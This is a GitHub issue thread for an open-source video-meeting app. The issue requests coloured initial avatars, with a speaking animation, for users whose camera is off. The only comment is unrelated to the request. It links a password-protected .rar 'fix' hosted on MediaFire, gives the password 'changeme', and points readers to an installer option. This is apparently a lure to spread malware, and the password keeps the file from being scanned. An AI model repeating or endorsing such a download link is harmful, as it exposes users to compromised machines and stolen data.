### ISSUE TITLE
Avatar when camera is off

### ISSUE THREAD

**Issue by lebaudantoine** [numerique-gouv/meet#121]
## Feature Request

**Is your feature request related to a problem or unsupported use case? Please describe.**

Users' feedbacks. At least, from @sampaccoud @arnaud-robin and O. Heintrz

**Describe the solution you'd like**
Follow GMeet implementation. A circle of a given color per user, with their initials. Add animation when the user is speaking.

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
